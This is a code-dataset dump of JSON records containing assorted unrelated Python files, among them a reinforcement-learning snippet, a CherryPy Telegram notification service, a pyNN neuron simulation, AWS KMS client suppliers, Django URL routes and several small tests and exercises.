gamma, state)\n\ndef improve_policy(env, gamma=1.0, terms=1e9): \n policy = np.ones([env.nS, env.nA]) / env.nA\n evals = 1\n for i in range(int(terms)):\n stable = True \n V = eval_policy(policy, env, gamma=gamma)\n for state in range(env.nS):\n current_action = np.argmax(policy[state])\n action_value = lookahead(env, state, V, gamma)\n best_action = np.argmax(action_value)\n if current_action != best_action:\n stable = False \n policy[state] = np.eye(env.nA)[best_action]\n evals += 1 \n if stable:\n return policy, V\n\ndef eval_policy(policy, env, gamma=1.0, theta=1e-9, terms=1e9): \n V = np.zeros(env.nS) \n delta = 0\n for i in range(int(terms)): \n for state in range(env.nS): \n act(V, env, gamma, policy, state, v=0.0) \n clear()\n print(V)\n time.sleep(1) \n v = np.sum(V)\n if v - delta < theta:\n return V\n else:\n delta = v\n return V\n\npolicy, V = improve_policy(env.env) \nprint(policy, V)\n\n","sub_path":"Chapter02/Chapter_2/Chapter_2_6.py","file_name":"Chapter_2_6.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"15823123","text":"from PySide.QtCore import Qt\nfrom qtodb.database_model.objectlistmodel import ObjectListModel\nfrom qtodb.database_model.tests.fixtures import Dummy, ModelIndexDuck\n\n\ndef test_model_data():\n model = ObjectListModel([], None)\n model.addAttributeColumn(\"number\", \"Number\")\n model.addAttributeColumn(\"text\", \"Text\")\n for i in range(1, 4):\n model.appendObject(Dummy(i, \"Object{0}\".format(i)))\n assert model.data(ModelIndexDuck(1,0), Qt.DisplayRole) == \"2\"\n assert model.data(ModelIndexDuck(2,1), Qt.DisplayRole) == \"Object3\"\n","sub_path":"src/python/qtodb/database_model/tests/test_objectlistmodel.py","file_name":"test_objectlistmodel.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"277882982","text":"import cherrypy\nimport socket\nimport threading\nimport json\nimport requests\nimport time\nimport sys\n\nclass ProductOutputREST(object):\n\n\t# expose the Web Services\n\texposed = True\n\n\tdef __init__(self , bot_Token , catalog_URL):\n\t\tself.bot_Token = bot_Token\n\t\tself.catalog_URL = catalog_URL\n\n\tdef GET (self, *uri, **params):\n\t\tif (len(uri)!=1):\n\t\t\traise cherrypy.HTTPError(404, \"Error: wrong number of uri\")\n\n\t\telif (uri[0] == \"delete_product\"):\n\t\t\tFridge_ID = params[\"FridgeID\"]\n\t\t\tuserID = params[\"userID\"]\n\t\t\tproduct_ID = params[\"product_name\"]\n\t\t\tbrand = params[\"brands\"]\n\n\t\t\tprint(userID)\n\t\t\tprint(Fridge_ID)\n\t\t\tprint(\"A product to remove from the fridge has been received\")\n\n\t\t\tr = requests.get(self.catalog_URL + 'user?ID=' + str(userID))\n\t\t\t\t\t\t\t\t \n\t\t\tr.raise_for_status()\n\t\t\tdetail_user = r.json()\n\t\t\tuser = json.loads(detail_user['user'])\n\t\t\tID_bot = user['ID_bot']\n\n\n\t\t\tr2 = requests.get('https://api.telegram.org/bot' + self.bot_Token + '/sendMessage?chat_id=' + str(ID_bot) +\n\t\t\t\t\t\t\t\t\t\t '&text=' + 'The product ' + str(product_ID) + ' has been removed from the fridge ' + str(Fridge_ID) + \n\t\t\t\t\t\t\t\t\t\t '. 
Please write /add_wasted and specify if it is wasted or not.')\n\n\n\n\tdef POST (self, *uri, **params):\n\t\tpass\n\t\treturn\n\n\tdef PUT (self, *uri, **params):\n\t\tpass\n\t\treturn\n\n\tdef DELETE(self):\n\t\tpass\n\t\treturn\n\nclass RegistrationThread(threading.Thread):\n\n\t\tdef __init__(self, catalogIP, catalogPort, devIP, devPort):\n\t\t\tthreading.Thread.__init__(self)\n\n\t\tdef run(self):\n\t\t\turl = \"http://\"+ catalogIP + \":\" + catalogPort + \"/\"\n\t\t\twhile True:\n\n\t\t\t\t### register BarcodeConversionREST as a web service\n\t\t\t\tdictWS = {\"name\": (\"ProductOutputWS\"),\n\t\t\t\t\t\t\t\t\t\"IP\": devIP,\n\t\t\t\t\t\t\t\t\t\"port\": devPort}\n\t\t\t\tjsonWS = json.dumps(dictWS)\n\t\t\t\tr = requests.post(url+\"add_WS\", data=jsonWS)\n\n\t\t\t\tprint(\"ProductOutputWS registered.\")\n\n\t\t\t\ttime.sleep(60)\n\n\n\nif __name__ == '__main__':\n\n\n\tconf = {\n\t\t'/': {\n\t\t\t'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n\t\t\t'tools.sessions.on': True\n\t\t}\n\t}\n\n\ts = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n\ts.connect((\"8.8.8.8\", 80))\n\tdevIP = s.getsockname()[0]\n\tdevPort = 8691 \n\n\ttry:\n\t\tconfigFile = open(\"../configSystem.json\", \"r\")\n\t\tconfigJson = configFile.read()\n\t\tconfigDict = json.loads(configJson)\n\t\tconfigFile.close()\n\texcept OSError:\n\t\tsys.exit(\"ERROR: cannot open the configuration file.\")\n\n\tcatalogIP = configDict[\"catalogIP\"]\n\tcatalogPort = configDict[\"catalogPort\"]\n\tcatalog_URL = \"http://\" + catalogIP + \":\" + catalogPort + \"/\"\n\n\tprint(\"Catalog IP is: \" + catalogIP)\n\tprint(\"Catalog port is \" + catalogPort)\n\n\tfile2 = open(\"../configBot.json\", \"r\")\n\tinfo2 = json.loads(file2.read())\n\tbot_Token = info2[\"token\"]\n\tfile2.close()\n\n\tregThread = RegistrationThread(catalogIP, catalogPort, devIP, devPort)\n\tregThread.start()\n\n\n\tcherrypy.tree.mount(ProductOutputREST(bot_Token,catalog_URL), '/', conf)\n\tcherrypy.config.update({'server.socket_host': '0.0.0.0'})\n\tcherrypy.config.update({'server.socket_port': devPort})\n\tcherrypy.engine.start()\n\tcherrypy.engine.block()","sub_path":"OtherWS/Product_Output_WS.py","file_name":"Product_Output_WS.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292294559","text":"from cn.edustar.jitar.pojos import Category\r\nfrom base_blog_page import *\r\nfrom com.alibaba.fastjson import JSONObject\r\nfrom base_action import BaseAction\r\nfrom cn.edustar.jitar.data import Command\r\nfrom cn.edustar.jitar.util import ParamUtil\r\nfrom cn.edustar.data import Pager\r\nfrom video_query import VideoQuery\r\n\r\n# 本模块全局变量\r\nuser_svc = __jitar__.userService\r\ncate_svc = __jitar__.categoryService\r\n\r\nclass show_user_video_category(BaseAction, RequestMixiner, ResponseMixiner, PageCheckMixiner, CategoryMixiner):\r\n def execute(self):\r\n self.params = ParamUtil(request)\r\n self.loginName = request.getAttribute(\"loginName\")\r\n # 解析 uri\r\n if self.parseUri() == False:\r\n return self.sendNotFound(self.uri) \r\n \r\n # 得到要工作室主人, 并验证用户状态\r\n self.user = user_svc.getUserByLoginName(self.loginName)\r\n request.setAttribute(\"user\", self.user)\r\n request.setAttribute(\"loginUser\", self.loginUser)\r\n #print \"self.user = \", self.user]\r\n if self.canVisitUser(self.user) == False:\r\n return self.ACCESS_ERROR\r\n \r\n request.setAttribute(\"loginUser\", self.loginUser)\r\n \r\n \r\n # 创建分页对象\r\n pager = self.params.createPager()\r\n 
pager.setPageSize(18)\r\n qry = VideoQuery(\"\"\" v.videoId, v.title, v.createDate, v.lastModified, v.flvThumbNailHref, v.href, v.commentCount, v.viewCount, u.nickName, u.loginName, u.userIcon \"\"\")\r\n qry.userId = self.user.userId\r\n qry.isPrivateShow = None\r\n if self.categoryId != 0 :\r\n qry.userStapleId = self.categoryId\r\n \r\n #print \"userStapleId = \", userStapleId\r\n pager.totalRows = qry.count()\r\n pager.itemName = u\"视频\"\r\n pager.itemUnit = u\"个\"\r\n qry.orderType = 0\r\n \r\n result = qry.query_map(pager)\r\n request.setAttribute(\"video_list\", result)\r\n request.setAttribute(\"pager\", pager)\r\n \r\n hql = \"\"\"SELECT new Map(p.skin as skin)\r\n FROM Page p \r\n WHERE p.name = 'index' and p.objId = :userId and p.objType = 1\r\n \"\"\" \r\n pageSkin = Command(hql).setInteger(\"userId\", self.user.userId).first()\r\n \r\n # 构造页面数据,由于页面不是在数据库存在的,这里的数据是虚拟数据.\r\n #pages : [{id: ${page.pageId}, title: '${user.blogName!?js_string}', layoutId: ${page.layoutId!0} }],\r\n page = {\r\n \"pageId\":0,\r\n \"layoutId\":2, # 固定是布局2\r\n \"isSystemPage\" : \"true\",\r\n \"owner\" : \"user\",\r\n \"title\" :\"\",\r\n \"skin\":pageSkin[\"skin\"]\r\n } \r\n request.setAttribute(\"page\", page)\r\n self.page = self.getUserProfilePage(self.user)\r\n if self.page.customSkin != None:\r\n customSkin = JSONObject.parse(self.page.customSkin)\r\n request.setAttribute(\"customSkin\", customSkin)\r\n \r\n # 构造widgets .\r\n widgets = [\r\n {\"id\": \"1\", \"pageId\":0, \"columnIndex\":1, \"title\":u\"个人档案\", \"module\":\"profile\", \"ico\":\"\", \"data\":\"\"}\r\n #, {\"id\": \"2\", \"pageId\":0, \"columnIndex\":1, \"title\":\"视频分类\", \"module\":\"video_cate\", \"ico\":\"\", \"data\":\"\"}\r\n , {\"id\": \"placerholder1\", \"pageId\":0, \"columnIndex\":2, \"title\":\"\", \"module\":\"placeholder\", \"ico\":\"\", \"data\":\"\"}\r\n ]\r\n \r\n request.setAttribute(\"widgets\", widgets)\r\n request.setAttribute(\"widget_list\", widgets)\r\n \r\n response.setContentType(\"text/html; charset=UTF-8\")\r\n return \"/WEB-INF/user/default/user_videos.ftl\"\r\n \r\n \r\n # 解析 uri, 从中获取要访问的 loginName, categoryId.\r\n def parseUri(self):\r\n self.uri = self.getRequestURI()\r\n #print \"self.uri =\", self.uri\r\n if self.uri == None or self.uri == \"\":\r\n return False\r\n \r\n # 例子: /Groups/liujunxing/rescate/0.html -> \r\n # ['', 'Groups', 'liujunxing', 'rescate', '0.html']\r\n # 其中最后一个是分类标识+'.html', 倒数第3个是用户登录名.\r\n arr = self.uri.split('/')\r\n arr_len = len(arr)\r\n if arr_len < 3:\r\n return False\r\n \r\n # 得到分类标识部分.\r\n category_part = self.removeHtmlExt(arr[arr_len - 1]) # 153.html -> 153\r\n if isIntegerStrong(category_part) == False: \r\n return False\r\n self.categoryId = int(category_part)\r\n #print \"self.categoryId = \", self.categoryId \r\n \r\n return True\r\n","sub_path":"WebContent/WEB-INF/program/blog/show_user_video_category.py","file_name":"show_user_video_category.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"32034368","text":"\"\"\"\nsame as 0-1 knapsack problem, however we can take fractions of weights\nreturn max value you can carry without exceeding knapsack\n\"\"\"\n\n\ndef solve(values, weights):\n currweight = 0\n maxval = 0\n lasti = 0\n for i, w in enumerate(weights):\n if cap - currweight - w >= 0:\n currweight += w\n maxval += values[i]\n else:\n lasti = i\n break\n\n left = cap - currweight\n n = weights[i] / left\n maxval += values[i] / n\n return maxval\n\n\ndef 
sort(values, weights):\n for _ in range(len(values)):\n for i in range(len(values) - 1):\n first = values[i] / weights[i]\n second = values[i + 1] / weights[i + 1]\n if second > first:\n values[i], values[i + 1] = values[i + 1], values[i]\n weights[i], weights[i + 1] = weights[i + 1], weights[i]\n\n\nvalues = [120, 100, 60]\nweights = [30, 20, 10]\ncap = 50\n\nsort(values, weights)\nprint(solve(values, weights))\n","sub_path":"Random/FractionalKnapsack.py","file_name":"FractionalKnapsack.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9171808","text":"class Lobby:\n\n def __init__(self, user):\n self.users = []\n self.users.append(user)\n self.usersScoreSetted = 0\n self.onEnd = None\n\n def adduser(self, user):\n self.users.append(user)\n for user in self.users:\n user.score = 0\n user.sendMsg(\"start:;\")\n\n def setScore(self, user, score):\n user.score = score\n self.usersScoreSetted += 1\n\n if self.usersScoreSetted < 2: return\n\n self.endGame()\n\n def endGame(self):\n user1 = self.users[0]\n user2 = self.users[1]\n\n user1.sendMsg(\"end:{};\".format(user2.score))\n user2.sendMsg(\"end:{};\".format(user1.score))\n\n if self.onEnd is None: return\n\n self.onEnd(self)\n\n\n def isFull(self):\n return len(self.users) > 1\n","sub_path":"lobby.py","file_name":"lobby.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98342716","text":"# *_*coding:utf-8 *_*\nfrom tkinter import *\nimport random\nimport sys\nimport os\nsys.path.append(\"./para\")\nfrom PIL import Image, ImageTk\n\n# 批处理\ndef run1():\n batch = 100\n start = 'the send_dir is '\n second = 'the batch is '\n txt.insert(END, start)# 显示详情\n txt.insert(END, send_dir) # 显示weight\n txt.insert(END, '\\n') # 换行\n txt.insert(END, second)# 显示详情\n txt.insert(END, str(batch))# 显示详情\n txt.insert(END, '\\n') # 换行\n txt.insert(END, '\\n') # 换行\n\n# 单张\ndef run2():\n batch = 1\n start = 'the receive_dir is '\n second = 'the batch is '\n txt.insert(END, start)# 显示详情\n txt.insert(END, receive_dir) # 显示weight\n txt.insert(END, '\\n') # 换行\n txt.insert(END, second)# 显示详情\n txt.insert(END, str(batch))# 显示详情\n txt.insert(END, '\\n') # 换行\n txt.insert(END, '\\n') # 换行\n\n# 发送数据给FPGA\ndef run3():\n i = 0\n while not os.listdir(receive_dir) :\n i += 1\n for r in os.listdir(receive_dir):\n for s in os.listdir(send_dir):\n if r == s:\n # 显示fpga计算的原始图片\n lb1 = Label(root, text='原始图片 ')\n lb1.place(relx=0.1, rely=0.5, relwidth=0.1, relheight=0.1)\n image_s = Image.open(os.path.join(send_dir, s))\n image_s = ImageTk.PhotoImage(image=image_s)\n lb2 = Label(image=image_s)\n lb2.place(relx=0.1, rely=0.6)\n\n # 显示fpga计算的预测图片\n lb3 = Label(root, text='预测显示 ')\n lb3.place(relx=0.5, rely=0.5, relwidth=0.1, relheight=0.1)\n image_r = Image.open(os.path.join(receive_dir, r))\n image_r = ImageTk.PhotoImage(image=image_r)\n lb4 = Label(image=image_r)\n lb4.place(relx=0.5, rely=0.6)\n\nroot = Tk()\nroot.geometry('800x800')\nroot.title('上位机')\n\nreceive_dir = '/home/dapang/workspace/新建文件夹'\nsend_dir = ''\n# inp1 = Entry(root)\n# inp1.place(relx=0.1, rely=0.1, relwidth=0.3, relheight=0.1)\n# inp2 = Entry(root)\n# inp2.place(relx=0.6, rely=0.1, relwidth=0.3, relheight=0.1)\n\n# 批处理目录 run1()\nbtn1 = Button(root, text='批处理', command=run1)\nbtn1.place(relx=0.1, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 接收测试结果的目录 run2()\nbtn2 = Button(root, text='接收结果', 
command=run2)\nbtn2.place(relx=0.4, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 发送目录给FPGA run3()\nbtn3 = Button(root, text='计算', command=run3)\nbtn3.place(relx=0.7, rely=0.1, relwidth=0.2, relheight=0.1)\n\n# 在窗体垂直自上而下位置60%处起,布局相对窗体高度40%高的文本框\ntxt = Text(root)\ntxt.place(relx=0.1, rely=0.3, relwidth=0.8,relheight=0.1)\n\nroot.mainloop()\n","sub_path":".github/workflows/grahic.py","file_name":"grahic.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"122213626","text":"import sys\nsys.path.insert(0, \"../../pyfunctor\")\n\nimport csv_handler as csv_handler\nimport transform as transformer\n\n#usage: python type_extractor.py [type] \n\ntypename = sys.argv[1]\n# typename = 'evaluation' # options: evaluation, request, fact, reference, quote, non-arg\nassert(typename in {'evaluation', 'request', 'fact', 'reference', 'quote'})\n\ndef extract(data, typename):\n dataset = csv_handler.csv_readlines(\"./dataset/\" + data + \"set.csv\")\n dataset = transformer.indexleft_func(dataset)\n dataset = transformer.map_func(dataset, lambda row : (row[0], row[1][1], row[1][2]))\n output_path = \"./\" + data + \".csv\"\n\n def e_func(triplet):\n label = 0\n if triplet[2] == typename:\n label = 1\n return (triplet[0], triplet[1], label)\n\n\n final = transformer.map_func(dataset, lambda triplet: e_func(triplet))\n csv_handler.csv_writelines(output_path, final)\n\nextract('train', typename)\nextract('dev', typename)\n\n","sub_path":"data/EVAL/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237034924","text":"n=10\nx=3\n\nsum=n\np=0\nk=pow(x,p)\npowers=[]\ntemp=0\nwhile k<=sum:\n for z in powers:\n temp=temp+pow(x,int(z))\n if temp is n:\n break\n elif k=sum:\n if k is sum:\n powers.append(str(p))\n k=pow(x,p)\n else:\n p=p-1\n powers.append(str(p))\n k=pow(x,p)\n p=0\n temp=temp+k\n sum=n-temp\n temp=0\n k=pow(x,p)\n\n\nprint(powers)","sub_path":"problem1/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313883937","text":"import matplotlib\n#matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pynn_genn as pynn\nfrom pyNN.utility.plotting import *\n\ndef plot_spiketrains(segment):\n for spiketrain in segment.spiketrains:\n y = np.ones_like(spiketrain) * spiketrain.annotations['source_id']\n plt.plot(spiketrain, y, '.')\n plt.ylabel(segment.name)\n plt.setp(plt.gca().get_xticklabels(), visible=True)\n\n\ndef plot_signal(signal, index, colour=None):\n label = \"Neuron %d\" % signal.annotations['source_ids'][index]\n plt.plot(signal.times, signal[:, index], color=colour, label=label)\n plt.ylabel(\"%s (%s)\" % (signal.name, signal.units._dimensionality.string))\n plt.setp(plt.gca().get_xticklabels(), visible=True)\n plt.legend()\n\n\nN_NEURONS = 1\nw = 0.01\nsim_timestep = 0.1\nsyn_delay = sim_timestep\nv_init = -50.0\n\nneuron_parameters = {\n 'v_thresh': -35.0,\n 'tau_m': 20.,\n 'tau_refrac': 10.0,\n 'v_reset': -60.0, #hdbrgs\n 'tau_syn_E': 5.0,\n 'tau_syn_I': 5.0,\n 'i_offset': 0.0,\n #ESS - BrainScaleS\n 'cm': 0.2,\n 'v_rest': v_init,\n 'e_rev_E': 0.,\n 'e_rev_I': -92.,\n 'tau_slow': 10.0,\n 'tau_syn_E_slow': 100.0,\n 'tau_syn_I_slow': 100.0,\n 'v_activate_slow': -100.0,\n\n}\n\npynn.setup(timestep=sim_timestep, 
use_cpu=True)\nneuron_class = pynn.IF_curr_exp_slow\nneuron_class = pynn.IF_cond_exp_slow\n\nneurons = pynn.Population(N_NEURONS,\n neuron_class(**neuron_parameters),\n label='Target'\n )\nneurons.record(['spikes', 'v', 'v_slow', 'dvdt'])\n\npynn.initialize(neurons, v=v_init)\npynn.initialize(neurons, v_slow=v_init)\npynn.initialize(neurons, v_slow_old=v_init)\n\n\ninputs = pynn.Population(N_NEURONS,\n pynn.SpikeSourcePoisson(rate=100.0),\n label='Input'\n )\ndoper = pynn.Population(N_NEURONS,\n pynn.SpikeSourceArray(spike_times=[60.0]),\n label='Feedback'\n )\n\n\nsyn = pynn.StaticSynapse(weight=w*0.01, delay=syn_delay)\nproj = pynn.Projection(doper, neurons,\n pynn.OneToOneConnector(), syn,\n receptor_type='excitatory_slow')\n\nsyn = pynn.StaticSynapse(weight=w, delay=syn_delay)\nproj = pynn.Projection(inputs, neurons,\n pynn.OneToOneConnector(), syn,\n receptor_type='excitatory')\n\npynn.run(100.0)\n\ndata = neurons.get_data()\nif len(data.segments):\n data = data.segments[0]\n out_spikes = np.array(data.spiketrains)\n\n pynn.end()\n\n plt.figure()\n plt.suptitle('Spikes')\n plot_spiketrains(data)\n plt.xlabel(\"time (%s)\" % data.analogsignals[0].times.units._dimensionality.string)\n\n # plt.figure()\n for arr in data.analogsignals:\n plt.figure()\n plt.suptitle('%s'%arr.name)\n for i in range(arr.shape[1]):\n\n plot_signal(arr, i)\n\n plt.grid()\n plt.xlabel(\"time (%s)\" % arr.times.units._dimensionality.string)\n\n\n plt.show()\n\n\n\n\n","sub_path":"codebase/slow_dvdt/test_neuron_properties.py","file_name":"test_neuron_properties.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"315629177","text":"\"\"\"\nunit tests for the metric/ distance estimator\n.. 
codeauthor:: Maximilian Springenberg \n\"\"\"\n# unit-test relevant imports\nfrom unittest import TestCase\n# own code\nfrom src.estimation import base\nfrom src.util.phoc_util import phoc\n\n\nclass TestDistEstimator(TestCase):\n\n def setUp(self):\n # all combinations of the characters \"cat\"\n self.words = []\n for c1 in 'cat':\n self.words.append(c1)\n for c2 in 'cat':\n self.words.append(c1+c2)\n for c3 in 'cat':\n self.words.append(c1+c2+c3)\n # estimator\n self.est = base.DistEstimator(self.words, 'cosine')\n\n def test_estimate(self):\n # estimate and check for results\n query = [phoc('cat')]\n query_words = ['cat']\n self.assertEqual(self.est.estimate_set(query), query_words)\n","sub_path":"test/estimation/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"114581432","text":"from PyQt5.QtCore import *\n\n\nclass Truck(QObject):\n \"\"\"\n General truck class with common types and functions\n \"\"\"\n def __init__(self):\n QObject.__init__(self)\n self.truck_name = None\n self.current_time = 0\n self.function_list = []\n self.times = {'arrival_time': 0}\n self.current_state = 0\n self.state_signal = False\n self.behaviour_list = []\n self.relevant_data = None\n self.changeover_time = 0\n self.next_state_time = 0\n self.current_door = None\n self.finish_time = 0\n\n def run(self, current_time):\n self.current_time = current_time\n self.function_list[self.current_state]()\n if self.state_signal:\n self.state_signal = False\n return 1\n return 0\n\n def coming(self):\n if self.times['arrival_time'] == self.current_time:\n self.times['arrived'] = self.current_time\n self.next_state()\n\n def next_state(self, name=None):\n self.state_signal = True\n if name:\n print('name')\n print(self.behaviour_list.index('loading'))\n self.current_state = self.behaviour_list.index(name)\n else:\n self.current_state += 1","sub_path":"src/truck.py","file_name":"truck.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"573927778","text":"# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\"\"\"AWS KMS client suppliers for use with AWS KMS keyring.\n\n.. versionadded:: 1.5.0\n\n\"\"\"\nimport functools\nimport logging\n\nimport attr\nimport six\nfrom attr.validators import deep_iterable, instance_of, is_callable, optional\nfrom botocore.client import BaseClient\nfrom botocore.config import Config as BotocoreConfig\nfrom botocore.session import Session as BotocoreSession\n\nfrom aws_encryption_sdk.exceptions import UnknownRegionError\nfrom aws_encryption_sdk.identifiers import USER_AGENT_SUFFIX\nfrom aws_encryption_sdk.internal.validators import value_is_not_a_string\n\nfrom ._client_cache import ClientCache\n\ntry: # Python 3.5.0 and 3.5.1 have incompatible typing modules\n from typing import Callable, Union # noqa pylint: disable=unused-import\n\n ClientSupplierType = Callable[[Union[None, str]], BaseClient]\nexcept ImportError: # pragma: no cover\n # We only actually need these imports when running the mypy checks\n pass\n\n_LOGGER = logging.getLogger(__name__)\n__all__ = (\n \"ClientSupplier\",\n \"ClientSupplierType\",\n \"DefaultClientSupplier\",\n \"AllowRegionsClientSupplier\",\n \"DenyRegionsClientSupplier\",\n)\n\n\nclass ClientSupplier(object):\n \"\"\"Base class for client suppliers.\n\n .. 
versionadded:: 1.5.0\n\n \"\"\"\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n \"\"\"\n raise NotImplementedError(\"'ClientSupplier' is not callable\")\n\n\n@attr.s\nclass DefaultClientSupplier(ClientSupplier):\n \"\"\"The default AWS KMS client supplier.\n Creates and caches clients for any region.\n\n .. versionadded:: 1.5.0\n\n If you want clients to have special credentials or other configuration,\n you can provide those with custom ``botocore`` Session and/or `Config`_ instances.\n\n .. _Config: https://botocore.amazonaws.com/v1/documentation/api/latest/reference/config.html\n\n .. code-block:: python\n\n from aws_encryption_sdk.keyrings.aws_kms.client_supplier import DefaultClientSupplier\n from botocore.session import Session\n from botocore.config import Config\n\n my_client_supplier = DefaultClientSupplier(\n botocore_session=Session(**_get_custom_credentials()),\n client_config=Config(connect_timeout=10),\n )\n\n :param botocore_session: Botocore session to use when creating clients (optional)\n :type botocore_session: botocore.session.Session\n :param client_config: Config to use when creating client (optional)\n :type client_config: botocore.config.Config\n \"\"\"\n\n _botocore_session = attr.ib(default=attr.Factory(BotocoreSession), validator=instance_of(BotocoreSession))\n _client_config = attr.ib(\n default=attr.Factory(functools.partial(BotocoreConfig, user_agent_extra=USER_AGENT_SUFFIX)),\n validator=instance_of(BotocoreConfig),\n )\n\n def __attrs_post_init__(self):\n \"\"\"Set up the internal cache.\"\"\"\n self._client_cache = ClientCache(botocore_session=self._botocore_session, client_config=self._client_config)\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n \"\"\"\n return self._client_cache.client(region_name=region_name, service=\"kms\")\n\n\n@attr.s\nclass AllowRegionsClientSupplier(ClientSupplier):\n \"\"\"AWS KMS client supplier that only supplies clients for the specified regions.\n\n .. versionadded:: 1.5.0\n\n :param List[str] allowed_regions: Regions to allow\n :param ClientSupplier client_supplier: Client supplier to wrap (optional)\n \"\"\"\n\n allowed_regions = attr.ib(\n validator=(deep_iterable(member_validator=instance_of(six.string_types)), value_is_not_a_string)\n )\n _client_supplier = attr.ib(default=attr.Factory(DefaultClientSupplier), validator=optional(is_callable()))\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n :raises UnknownRegionError: if a region is requested that is not in ``allowed_regions``\n \"\"\"\n if region_name not in self.allowed_regions:\n raise UnknownRegionError(\"Unable to provide client for region '{}'\".format(region_name))\n\n return self._client_supplier(region_name)\n\n\n@attr.s\nclass DenyRegionsClientSupplier(ClientSupplier):\n \"\"\"AWS KMS client supplier that supplies clients for any region except for the specified regions.\n\n .. 
versionadded:: 1.5.0\n\n :param List[str] denied_regions: Regions to deny\n :param ClientSupplier client_supplier: Client supplier to wrap (optional)\n \"\"\"\n\n denied_regions = attr.ib(\n validator=(deep_iterable(member_validator=instance_of(six.string_types)), value_is_not_a_string)\n )\n _client_supplier = attr.ib(default=attr.Factory(DefaultClientSupplier), validator=optional(is_callable()))\n\n def __call__(self, region_name):\n # type: (Union[None, str]) -> BaseClient\n \"\"\"Return a client for the requested region.\n\n :rtype: BaseClient\n :raises UnknownRegionError: if a region is requested that is in ``denied_regions``\n \"\"\"\n if region_name in self.denied_regions:\n raise UnknownRegionError(\"Unable to provide client for region '{}'\".format(region_name))\n\n return self._client_supplier(region_name)\n","sub_path":"src/aws_encryption_sdk/keyrings/aws_kms/client_suppliers.py","file_name":"client_suppliers.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408310953","text":"from django.conf.urls import url\nfrom customers.views import *\n\nurlpatterns = [\n\n # Example: /\n url(r'^$', CustomerLV.as_view(), name='index'),\n\n # Example: /customer/ (same as /)\n url(r'^customer/$', CustomerLV.as_view(), name='customer_list'),\n\n # Example: /customer/woochang\n url(r'^customer/(?P[-\\w]+)/$', CustomerDV.as_view(), name='customer_detail'),\n\n # Example: /search/\n url(r'^search/$', SearchFormView.as_view(), name='search'),\n\n # Example: /add/\n url(r'^add/$',\n CustomerCreateView.as_view(), name=\"add\",\n ),\n\n # Example: /change/\n url(r'^change/$', CustomerChangeLV.as_view(), name=\"change\",\n ),\n\n # Example: /99/update/\n url(r'^(?P[0-9]+)/update/$', CustomerUpdateView.as_view(), name=\"update\",\n ),\n\n # Example: /99/delete/\n url(r'^(?P[0-9]+)/delete/$', CustomerDeleteView.as_view(), name=\"delete\",\n ),\n\n\n]","sub_path":"customers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42033240","text":"\"\"\"\nUpdate note: Never use this module to test your emit functions.\nUse the file `auto_test.py` in the same directory instead.\n\n\"\"\"\n\nimport ast\nfrom astpretty import pprint\nfrom yapypy.extended_python.parser import parse\nfrom yapypy.extended_python.symbol_analyzer import ASTTagger, SymTable, to_tagged_ast, Tag\nfrom yapypy.extended_python.py_compile import py_compile\nimport dis\n\n\ndef parse_expr(expr_code):\n return parse(expr_code).result.body[0].value\n\n\nstmt = parse(\"\"\"\nprint(1)\ndef f(x):\n a = 1\n def g(y):\n a + 1\n def u(z):\n k = 1\n v + k\n v = 3\n k = 4\n\"\"\").result\n\nres: Tag = to_tagged_ast(stmt)\nprint(res.tag.show_resolution())\n#\nctx = {}\nexec(\n r\"\"\"\nfrom asyncio import sleep, get_event_loop\nclass S:\n def __init__(self): self.i = 0\n def __aiter__(self): return self\n async def __anext__(self):\n if self.i < 10:\n self.i += 1\n await sleep(0.1)\n return self.i\n raise StopAsyncIteration\n\ndef to_t(aiter):\n async def _():\n d = []\n async for each in aiter:\n d.append(each)\n return tuple(d)\n return get_event_loop().run_until_complete(_())\n\"\"\", ctx)\nstmt = parse(\"\"\"\nclass S:\n pass\n\"\"\").result\npprint(stmt)\n# code = py_compile(stmt)\n# 